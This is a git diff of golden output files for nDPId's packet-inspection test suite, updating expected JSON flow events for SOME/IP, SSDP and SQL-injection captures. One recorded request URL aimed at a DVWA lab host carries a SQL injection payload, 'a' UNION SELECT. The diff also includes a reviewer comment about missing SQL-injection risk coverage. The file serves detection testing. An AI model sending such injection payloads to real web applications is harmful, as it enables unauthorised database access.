00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1502789275686,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1502789275686,"pkt":"AQBeAAABdAAAAAC5CABFAAFkAHhAAAER12bAqAAB4AAAAcAmwCYBULPJ\/\/+BAAAAAUAAAAfdAQECAMAAAAAAAADAAQAAIBI0APwBAAADAAAAAAECABAAAAABAQAAAwAAAAIBAwAQAAAAAQEAAAMAAAAAAQQAIAAAAAEBAAADAAAAAAEGABAAAAABAQAAAwAAAAEBAQAQAAAAAQEAAAMAAAAAAQAAIAAAAAEBAAADAAAAAAEBABAAAAABAgAAAwAAAAABAQAQAAAAAQEAAAMAAAAAAQEAEAAAAAEBAAADAAAAAAEHABAAAAABAQAAAwAAAAEBCAAQAAAAAQEAAAMAAAAAAAAAbAAJBADAqAABAAbAMQAJBADAqAABABHAMQAJBADAqAABAAbAPwAJBADAqAABAAbAPwAJBADAqAABAAbAPwAJBADAqAABABHAPwAJBADAqAABABHAPwAJBADAqAABAAbAPwAJBADAqAABABHAPw=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275686,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275686,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275711,"flow_last_seen":1502789275711,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275711,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1502789275711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1502789275711,"pkt":"dAAAAAC5gAAAAAB1CABFAAA1AAAAAAERN+rAqAB9wKgAAcAnwDEAIefYEjQACAAAABEAAAABAQEAAAAAAAWrq6urqw=="} 
-00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275711,"flow_last_seen":1502789275711,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275711,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275711,"flow_last_seen":1502789275711,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275711,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1502789275713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1502789275713,"pkt":"gAAAAAB1dAAAAAC5CABFAAA1do9AAAERgVrAqAABwKgAfcAxwCcAIWfYEjQACAAAABEAAAABAQGAAAAAAAWrq6urqw=="} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1502789275711,"flow_last_seen":1502789275713,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1502789275711,"flow_last_seen":1502789275713,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","packets-captured":3,"packets-processed":3,"total-skipped-flows":0,"total-l4-payload-len":378,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1502789275713} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3/3 @@ -18,9 +18,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870562 bytes -~~ total memory freed........: 5870562 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6004196 bytes +~~ total memory freed........: 6004196 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 480 chars ~~ json string max len.......: 898 chars diff --git a/test/results/someip_sd_sample.pcap.out b/test/results/someip_sd_sample.pcap.out index c315a056c..74a17a303 100644 --- a/test/results/someip_sd_sample.pcap.out +++ b/test/results/someip_sd_sample.pcap.out @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 209 chars ~~ json string max len.......: 564 chars 
diff --git a/test/results/sql_injection.pcap.out b/test/results/sql_injection.pcap.out index 9a0e7b0db..bb435c641 100644 --- a/test/results/sql_injection.pcap.out +++ b/test/results/sql_injection.pcap.out 
@@ -2,10 +2,10 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655243907401} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655243907401,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":1,"thread_ts_msec":1655243907401,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01398{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":757,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":757,"pkt_l4_len":723,"thread_ts_msec":1655243907401,"pkt":"FE+Kc3lP4CvpcxhCCABFAALnBMxAAEAGqxzAqANtwKgDa9EYAFBtgZhQ14snP4AYAfYjSgAAAQEICpBN+1KzuubyR0VUIC9EVldBLW1hc3Rlci92dWxuZXJhYmlsaXRpZXMvc3FsaS8\/aWQ9JTNGaWQlM0RhJTI3K1VOSU9OK1NFTEVDVCslMjJ0ZXh0MSUyMiUyQyUyMnRleHQyJTIyJTNCLS0rLSUyNlN1Ym1pdCUzRFN1Ym1pdCZTdWJtaXQ9U3VibWl0IEhUVFAvMS4xDQpIb3N0OiAxOTIuMTY4LjMuMTA3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMDIuMC4wLjAgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjkNClJlZmVyZXI6IGh0dHA6Ly8xOTIuMTY4LjMuMTA3L0RWV0EtbWFzdGVyL3Z1bG5lcmFiaWxpdGllcy9zcWxpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGl0LUlULGl0O3E9MC45LGVuLVVTO3E9MC44LGVuO3E9MC43DQpDb29raWU6IFBIUFNFU1NJRD11YTdvdW1xY2g0aDJxZWx1YnB2bzIxZGVjNjsgc2VjdXJpdHk9bG93DQoNCg=="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655243907401,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":1,"thread_ts_msec":1655243907401,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/sqli\/?id=%3Fid%3Da%27+UNION+SELECT+%22text1%22%2C%22text2%22%3B--+-%26Submit%3DSubmit&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655243907401,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":1,"thread_ts_msec":1655243907401,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/sqli\/?id=%3Fid%3Da%27+UNION+SELECT+%22text1%22%2C%22text2%22%3B--+-%26Submit%3DSubmit&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655243907401,"pkt":"4CvpcxhCFE+Kc3lPCABFAAA0VvpAAEAGW6HAqANrwKgDbQBQ0RjXiyc\/bYGbA4AQAfhcQgAAAQEICrO7eEWQTftS"} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655243907402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1655243907402,"pkt":"4CvpcxhCFE+Kc3lPCABFAAXcVvtAAEAGVfjAqANrwKgDbQBQ0RjXiyc\/bYGbA4AQAfjDwgAAAQEICrO7eEeQTftSSFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBUdWUsIDE0IEp1biAyMDIyIDIxOjU4OjI3IEdNVA0KU2VydmVyOiBBcGFjaGUvMi40LjQxIChVYnVudHUpDQpFeHBpcmVzOiBUdWUsIDIzIEp1biAyMDA5IDEyOjAwOjAwIEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUsIG11c3QtcmV2YWxpZGF0ZQ0KUHJhZ21hOiBuby1jYWNoZQ0KVmFyeTogQWNjZXB0LUVuY29kaW5nDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpDb250ZW50LUxlbmd0aDogMTM3NQ0KS2VlcC1BbGl2ZTogdGltZW91dD01LCBtYXg9MTAwDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbDtjaGFyc2V0PXV0Zi04DQoNCh+LCAAAAAAAAAOlWP9P2zgU\/7lI+x98Pmls0yU+kE46sSQTUBg9sY0tsN1JJ1VO4rYGJ\/Fsp13vr79nO2kDg5UVCRH7+fnj5\/fdjX4Zfji+\/OfiBM1MKZKdnch+kaDVNMasCt4eYSAOohmjRbIzGEQlMxR4jQzY14bPY3xcV4ZVJrhcSoZR7mcxNuybIRbrNcpnVGlm4qvL0+BPjIgFHESGG8GSz42omKIZF9wsD1D68RyNqmuWG15X6OAADWlZoY5JMPSFZehQSsFz6lheDD9\/OXyJ5nvh3u\/o1ZDNmahlCRK8iog\/wR0meHWDFBMx1mYpmJ4xZjAyIHIraa41RjPFJjEOQwJ\/xXxBLZWUlFehWyZ3sTjctkP5l5d0ygiQbuNM6NyyhW6hRdC54tL0j7+mc+qpGGmV3xLiWrvvBcCH1xonEfGczi7EGwZGWV0sUS6o1jGe1SXDzlwFnyNexNjaBS7ClDNnb8HuX1EHES+n3wngbqaJqKd1KKspRlSAgTdYprssiAhH3TnU6nQMVmpW5363Mpa0KFjhbgHrjejuZhePRJ3fWFUI3
pFhQm8pPsTJGaghIhQ0Jniy8yNmXmmjGud1OpQziZNRj\/I4DHDxRvrNqR0igj4xIKLhUQ+ANCLZ4jbzXpxwMEamGsMITo7sF53WKn\/kTe8CsW8sB5zjuixpVayDbzu0XKuJRUs\/nW4HMOEkfCPB32Je5aIpmFfoKQcPG1mK3lq2RoqaFqQFu3KzLW9JpYGkRpyXsLxRDB0fXlwenx3ei6eZAJ1aX96Aq78KDqC3kuB2ElqkcQaZqriLh14cWfLL7XAXjN6MuQX9AiOUMm3tgUbDR8bIXbxvWo8t2t9pCqn8w7stxbIwqoP5xCZe308A0x1Yamq1NVKupQuGC3S0lLBlO5R1bQCwv2CSusnTc4pzXSi7PsRsIQWDetLjJIV9vJrUfv\/F2QV42aR+3Faa1Y3xGw\/t8Om3seWpgzx34zuYvpD0qtFDhclW0q4wPdtxa+2hdmVVmJ7Ztmjvhx0MlOc94LOcPZT5qmiO87pgY6oYdXCDaFKrElG3N8a\/YgTd1qwGud6eXHqOQST9d3ClmYLAO2jrdiWbfkcBbQT\/D8Z7f2BU0RJGfFVL+7y6yUpuOp60nc2paNbT9mAikx0nJLFSenmlYgnIgN6A8uguuno\/+vAepSfnJ8eXyMmxh39z3338OghQ8NxDxv4TZQq6hFOutHECHCC3xZPTRq1p+3A6HGUV6azmdTrbT95BeDq3UyVtNb7v2MDgz3y3tnYU27bqA0JYFS74DZes4DSs1ZTYGQHLjXlnOWjrqJpC04ohjdLqBic\/sXnleA9KsFgswooZLam6YSrM65Jk4MCQX7OgC0ubxIMVZpBDp2YC17mSh6V7IvBmyesF1dLfe7EIAL9sKotJjaEQo04Ro81a\/CmYzVJldZYtA2NjSrtLP3w="} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655243907401,"flow_last_seen":1655243907406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":483,"midstream":1,"thread_ts_msec":1655243907406,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655243907401,"flow_last_seen":1655243907406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":483,"midstream":1,"thread_ts_msec":1655243907406,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"sql_injection.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":2418,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1655243907406} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 
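Review bot: The expected `detected` and `idle` events for flow 1 list only flow_risk `12` ("HTTP Numeric IP Address"), although the recorded `http.url` carries a URL-encoded `UNION SELECT` in the `id` parameter. This golden file would therefore keep passing if SQL-injection risk reporting were absent or regressed. The same was true before this commit, which only changes the confidence key here. Whether libnDPI is supposed to raise a SQL-injection risk for this capture cannot be told from the hunk, so it should be confirmed against libnDPI's own result for the same pcap before this output is accepted as the baseline. If the omission is intended, a line in the test documentation such as `sql_injection.pcap: expected flow_risk is 12 only, see <ISSUE-ID>` would stop readers from assuming the file name implies coverage.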
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869880 bytes -~~ total memory freed........: 5869880 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003514 bytes +~~ total memory freed........: 6003514 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2432 chars diff --git a/test/results/ssdp-m-search-ua.pcap.out b/test/results/ssdp-m-search-ua.pcap.out index 527046583..ee5e804f6 100644 --- a/test/results/ssdp-m-search-ua.pcap.out +++ b/test/results/ssdp-m-search-ua.pcap.out 
@@ -2,10 +2,10 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1648315275444} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648315275444,"flow_last_seen":1648315275444,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315275444,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648315275444,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1648315275444,"pkt":"AQBef\/\/68C9LCZO8CABFAADKnWgAAAEReOXAqPIy7\/\/\/+tx+B2wAtraSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS85OS4wLjQ4NDQuNzQgTWFjIE9TIFgNCg0K"} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648315275444,"flow_last_seen":1648315275444,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315275444,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 